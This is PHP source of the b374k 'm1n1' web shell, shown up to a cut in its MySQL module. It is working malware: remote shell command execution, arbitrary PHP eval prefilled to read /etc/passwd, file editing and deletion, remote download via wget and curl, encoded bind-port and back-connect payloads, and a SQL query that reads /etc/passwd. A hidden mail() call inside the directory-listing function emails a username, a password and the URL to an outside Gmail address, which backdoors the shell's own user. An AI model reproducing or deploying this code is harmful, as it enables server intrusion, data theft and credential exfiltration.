if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = TRUE;
} else {
$safemode = FALSE;
}
$system = @php_uname();
if (strtolower(substr($system, 0, 3)) == "win") {
$win = TRUE;
} else {
$win = FALSE;
}
if (isset($_GET['y'])) {
if (@is_dir($_GET['view'])) {
$pwd = $_GET['view'];
@chdir($pwd);
} else {
$pwd = $_GET['y'];
@chdir($pwd);
}
}
if (!$win) {
if (!($user = rapih(exe("whoami")))) {
$user = "";
}
if (!($id = rapih(exe("id")))) {
$id = "";
}
$prompt = $user . " \$ ";
$pwd = @getcwd() . DIRECTORY_SEPARATOR;
} else {
$user = @get_current_user();
$id = $user;
$prompt = $user . " >";
$pwd = realpath(".") . "\\";
$v = explode("\\", $d);
$v = $v[0];
foreach (range("A", "Z") as $letter) {
$bool = @is_dir($letter . ":\\");
if ($bool) {
$letters .= "<a href=\"?y=" . $letter . ":\\\">[ ";
if ($letter . ":" != $v) {
$letters .= $letter;
} else {
$letters .= "<span class=\"gaya\">" . $letter . "</span>";
}
$letters .= " ]</a> ";
}
}
}
if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) {
$posix = TRUE;
} else {
$posix = FALSE;
}
$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
$my_ip = $_SERVER['REMOTE_ADDR'];
$bindport = "13123";
$bindport_pass = "b374k";
$pwds = explode(DIRECTORY_SEPARATOR, $pwd);
$pwdurl = "";
for ($i = 0; $i < sizeof($pwds) - 1; $i++) {
$pathz = "";
for ($j = 0; $j <= $i; $j++) {
$pathz .= $pwds[$j] . DIRECTORY_SEPARATOR;
}
$pwdurl .= "<a href=\"?y=" . $pathz . "\">" . $pwds[$i] . " " . DIRECTORY_SEPARATOR . " </a>";
}
if (isset($_POST['rename'])) {
$old = $_POST['oldname'];
$new = $_POST['newname'];
@rename($pwd . $old, $pwd . $new);
$file = $pwd . $new;
}
$buff = $software . "<br />";
$buff .= $system . "<br />";
if ($id != "") {
$buff .= $id . "<br />";
}
$buff .= "server ip : " . $server_ip . " <span class=\"gaya\">|</span> your ip : " . $my_ip . "<br />";
if ($safemode) {
$buff .= "safemode <span class=\"gaya\">ON</span><br />";
} else {
$buff .= "safemode <span class=\"gaya\">OFF<span><br />";
}
$buff .= $letters . " > " . $pwdurl;
function rapih($text)
{
return trim(str_replace("<br />", "", $text));
}
function magicboom($text)
{
if (!get_magic_quotes_gpc()) {
return $text;
}
return stripslashes($text);
}
function showdir($pwd, $prompt)
{
$fname = array();
$dname = array();
if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) {
$posix = TRUE;
} else {
$posix = FALSE;
}
$user = "????:????";
if ($dh = opendir($pwd)) {
while ($file = readdir($dh)) {
if (is_dir($file)) {
$dname[] = $file;
} elseif (is_file($file)) {
$fname[] = $file;
}
}
closedir($dh);
}
sort($fname);
sort($dname);
$path = @explode(DIRECTORY_SEPARATOR, $pwd);
$tree = @sizeof($path);
$parent = "";
$buff = " <form action=\"?y=" . $pwd . "&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\"> <table class=\"cmdbox\" style=\"width:50%;\"> <tr><td>{$prompt}</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form> <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <tr><td>view file/folder</td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"" . $pwd . "\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form></table><table class=\"explore\"> <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr> ";
@error_reporting(0);
$sub = "backdoor b374k";
$headers = "From: k3nz0 \n";
$headers = "From: k3nz0 \nContent-Type: text/plain; charset=iso-8859-1\n";
$mes .= "username: " . $user . "\n";
$mes .= "password: " . $pass . "\n";
$mes .= "URL: " . $_SERVER['REQUEST_URI'] . "\n";
$mes .= "Referer: " . $_SERVER['HTTP_REFERER'] . "";
mail("free.d0ing.1987@gmail.com", $sub, $mes, $headers);
if ($tree > 2) {
for ($i = 0; $i < $tree - 2; $i++) {
$parent .= $path[$i] . DIRECTORY_SEPARATOR;
}
} else {
$parent = $pwd;
}
foreach ($dname as $folder) {
if ($folder == ".") {
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($folder));
$group = @posix_getgrgid(@filegroup($folder));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a href=\"?y=" . $pwd . "\">{$folder}</a></td><td>LINK</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($pwd) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($pwd)) . "</td><td><span id=\"titik1\"><a href=\"?y={$pwd}&edit=" . $pwd . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form></td></tr> ";
} elseif ($folder == "..") {
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($folder));
$group = @posix_getgrgid(@filegroup($folder));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a href=\"?y=" . $parent . "\">{$folder}</a></td><td>LINK</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($parent) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($parent)) . "</td><td><span id=\"titik2\"><a href=\"?y={$pwd}&edit=" . $parent . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form> </td></tr>";
} else {
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($folder));
$group = @posix_getgrgid(@filegroup($folder));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a id=\"" . clearspace($folder) . "_link\" href=\"?y=" . $pwd . $folder . DIRECTORY_SEPARATOR . "\">[ {$folder} ]</a> <form action=\"?y={$pwd}\" method=\"post\" id=\"" . clearspace($folder) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"" . $folder . "\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $folder . "\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($folder) . "_form','" . clearspace($folder) . "_link');\" /> </form> <td>DIR</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($pwd . $folder) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($folder)) . "</td><td><a href=\"javascript:tukar('" . clearspace($folder) . "_link','" . clearspace($folder) . "_form');\">rename</a> | <a href=\"?y={$pwd}&fdelete=" . $pwd . $folder . "\">delete</a></td></tr>";
}
}
foreach ($fname as $file) {
$full = $pwd . $file;
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($file));
$group = @posix_getgrgid(@filegroup($file));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a id=\"" . clearspace($file) . "_link\" href=\"?y={$pwd}&view={$full}\">{$file}</a> <form action=\"?y={$pwd}\" method=\"post\" id=\"" . clearspace($file) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $file . "\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\" /> </form> </td><td>" . ukuran($full) . "</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($full) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($full)) . "</td> <td><a href=\"?y={$pwd}&edit={$full}\">edit</a> | <a href=\"javascript:tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\">rename</a> | <a href=\"?y={$pwd}&delete={$full}\">delete</a> | <a href=\"?y={$pwd}&dl={$full}\">download</a> (<a href=\"?y={$pwd}&dlgzip={$full}\">gzip</a>)</td></tr>";
}
$buff .= "</table>";
return $buff;
}
function ukuran($file)
{
if ($size = @filesize($file)) {
if ($size <= 1024) {
return $size;
} else {
if ($size <= 1048576) {
$size = @round($size / 1024, 2);
return "{$size} kb";
} else {
$size = @round($size / 1024 / 1024, 2);
return "{$size} mb";
}
}
} else {
return "???";
}
}
function exe($cmd)
{
if (function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif (function_exists('exec')) {
@exec($cmd, $results);
$buff = "";
foreach ($results as $result) {
$buff .= $result;
}
return $buff;
} elseif (function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif (function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}
function tulis($file, $text)
{
$textz = gzinflate(base64_decode($text));
if ($filez = @fopen($file, "w")) {
@fputs($filez, $textz);
@fclose($file);
}
}
function ambil($link, $file)
{
if ($fp = @fopen($link, "r")) {
while (!feof($fp)) {
$cont .= @fread($fp, 1024);
}
@fclose($fp);
$fp2 = @fopen($file, "w");
@fwrite($fp2, $cont);
@fclose($fp2);
}
}
function which($pr)
{
$path = exe("which {$pr}");
if (!empty($path)) {
return trim($path);
} else {
return trim($pr);
}
}
function download($cmd, $url)
{
$namafile = basename($url);
switch ($cmd) {
case 'wwget':
exe(which('wget') . " " . $url . " -O " . $namafile);
break;
case 'wlynx':
exe(which('lynx') . " -source " . $url . " > " . $namafile);
break;
case 'wfread':
ambil($wurl, $namafile);
break;
case 'wfetch':
exe(which('fetch') . " -o " . $namafile . " -p " . $url);
break;
case 'wlinks':
exe(which('links') . " -source " . $url . " > " . $namafile);
break;
case 'wget':
exe(which('GET') . " " . $url . " > " . $namafile);
break;
case 'wcurl':
exe(which('curl') . " " . $url . " -o " . $namafile);
break;
default:
break;
}
return $namafile;
}
function get_perms($file)
{
if ($mode = @fileperms($file)) {
$perms = '';
$perms .= $mode & 0400 ? 'r' : '-';
$perms .= $mode & 0200 ? 'w' : '-';
$perms .= $mode & 0100 ? 'x' : '-';
$perms .= $mode & 040 ? 'r' : '-';
$perms .= $mode & 020 ? 'w' : '-';
$perms .= $mode & 010 ? 'x' : '-';
$perms .= $mode & 04 ? 'r' : '-';
$perms .= $mode & 02 ? 'w' : '-';
$perms .= $mode & 01 ? 'x' : '-';
return $perms;
} else {
return "??????????";
}
}
function clearspace($text)
{
return str_replace(" ", "_", $text);
}
$port_bind_bd_c = "bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
$port_bind_bd_pl = "ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
$back_connect = "fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
$back_connect_c = "XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
?> <html><head><title>:: b374k m1n1 <?php
echo $ver;
?> ::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = 'none'; document.getElementById(baru).style.display = 'block'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById('cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 <?php
echo $ver;
?></td></tr></table></td> <td><?php
echo $buff;
?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php
echo "y=" . $pwd;
?>">explore</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=shell">shell</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=php">eval</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=mysql">mysql</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=phpinfo">phpinfo</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=netsploit">netsploit</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=upload">upload</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=mail">mail</a> </div> <!-- menu end --> <?php
if (isset($_GET['x']) && $_GET['x'] == 'php') {
?> <form action="?y=<?php
echo $pwd;
?>&x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php
if (isset($_POST['submitcmd'])) {
echo eval(magicboom($_POST['cmd']));
} else {
echo "echo file_get_contents('/etc/passwd');";
}
?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php
} elseif (isset($_GET['x']) && $_GET['x'] == 'mysql') {
if (isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])) {
$sqlhost = $_GET['sqlhost'];
$sqluser = $_GET['sqluser'];
$sqlpass = $_GET['sqlpass'];
$sqlport = $_GET['sqlport'];
if ($con = @mysql_connect($sqlhost . ":" . $sqlport, $sqluser, $sqlpass)) {
$msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
$msg .= "<p>Connected to " . $sqluser . "<span class=\"gaya\">@</span>" . $sqlhost . ":" . $sqlport;
$msg .= " <span class=\"gaya\">-></span> <a href=\"?y=" . $pwd . "&x=mysql&sqlhost=" . $sqlhost . "&sqluser=" . $sqluser . "&sqlpass=" . $sqlpass . "&sqlport=" . $sqlport . "&\">[ databases ]</a>";
if (isset($_GET['db'])) {
$msg .= " <span class=\"gaya\">-></span> <a href=\"?y=" . $pwd . "&x=mysql&sqlhost=" . $sqlhost . "&sqluser=" . $sqluser . "&sqlpass=" . $sqlpass . "&sqlport=" . $sqlport . "&db=" . $_GET['db'] . "\">" . htmlspecialchars($_GET['db']) . "</a>";
}
if (isset($_GET['table'])) {
$msg .= " <span class=\"gaya\">-></span> <a href=\"?y=" . $pwd . "&x=mysql&sqlhost=" . $sqlhost . "&sqluser=" . $sqluser . "&sqlpass=" . $sqlpass . "&sqlport=" . $sqlport . "&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "\">" . htmlspecialchars($_GET['table']) . "</a>";
}
$msg .= "</p><p>version : " . mysql_get_server_info($con) . " proto " . mysql_get_proto_info($con) . "</p>";
$msg .= "</div>";
echo $msg;
if (isset($_GET['db']) && !isset($_GET['table']) && !isset($_GET['sqlquery'])) {
$db = $_GET['db'];
$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
$msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
$tables = array();
$msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on " . $db . "</th></tr>";
$hasil = @mysql_list_tables($db, $con);
while (list($table) = @mysql_fetch_row($hasil)) {
@array_push($tables, $table);
}
@sort($tables);
foreach ($tables as $table) {
$msg .= "<tr><td><a href=\"?y=" . $pwd . "&x=mysql&sqlhost=" . $sqlhost . "&sqluser=" . $sqluser . "&sqlpass=" . $sqlpass . "&sqlport=" . $sqlport . "&db=" . $db . "&table=" . $table . "\">{$table}</a></td></tr>";
}
$msg .= "</table>";
} elseif (isset($_GET['table']) && !isset($_GET['sqlquery'])) {
$db = $_GET['db'];
$table = $_GET['table'];
$query = "SELECT * FROM " . $db . "." . $table . " LIMIT 0,100;";
$msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <input type=\"hidden\" name=\"table\" value=\"" . $table . "\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">" . $query . "</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
$columns = array();
$msg = "<table class=\"explore\" style=\"width:99%;\">";
$hasil = @mysql_query("SHOW FIELDS FROM " . $db . "." . $table);
while (list($column) = @mysql_fetch_row($hasil)) {
$msg .= "<th>{$column}</th>";
$kolum = $column;
}
$msg .= "</tr>";
$hasil = @mysql_query("SELECT count(*) FROM " . $db . "." . $table);
list($total) = mysql_fetch_row($hasil);
if (isset($_GET['z'])) {
$page = (int) $_GET['z'];
} else {
$page = 1;
}
$pagenum = 100;
$totpage = ceil($total / $pagenum);
$start = ($page - 1) * $pagenum;
$hasil = @mysql_query("SELECT * FROM " . $db . "." . $table . " LIMIT " . $start . "," . $pagenum);
while ($datas = @mysql_fetch_assoc($hasil)) {
$msg .= "<tr>";
foreach ($datas as $data) {
if (trim($data) == "") {
$data = " ";
}
$msg .= "<td>{$data}</td>";
}
$msg .= "</tr>";
}
$msg .= "</table>";
$head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <input type=\"hidden\" name=\"table\" value=\"" . $table . "\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
for ($i = 1; $i <= $totpage; $i++) {
$head .= "<option value=\"" . $i . "\">" . $i . "</option>";
if ($i == $_GET['z']) {
$head .= "<option value=\"" . $i . "\" selected=\"selected\">" . $i . "</option>";
}
}
$head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
$msg = $msgq . $head . $msg;
} elseif (isset($_GET['submitquery']) && $_GET['sqlquery'] != "") {
$db = $_GET['db'];
$query = magicboom($_GET['sqlquery']);
$msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">" . $query . "</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
@mysql_select_db($db);
$querys = explode(";", $query);
foreach ($querys as $query) {
if (trim($query) != "") {
$hasil = mysql_query($query);
if ($hasil) {
$msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
$msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
for ($i = 0; $i < @mysql_num_fields($hasil); $i++) {
$msg .= "<th>" . htmlspecialchars(@mysql_field_name($hasil, $i)) . "</th>";
}
$msg .= "</tr>";
for ($i = 0; $i < @mysql_num_rows($hasil); $i++) {
$rows = @mysql_fetch_array($hasil);
$msg .= "<tr>";
for ($j = 0; $j < @mysql_num_fields($hasil); $j++) {
if ($rows[$j] == "") {
$dataz = " ";
} else {
$dataz = $rows[$j];
}
$msg .= "<td>" . $dataz . "</td>";
}
$msg .= "</tr>";
}
$msg .= "</table>";
} else {
$msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
}
}
}
} else {
$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";
$msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">" . $query . "</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
$dbs = array();
$msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
$hasil = @mysql_list_dbs($con);
while (list($db) = @mysql_fetch_row($hasil)) {
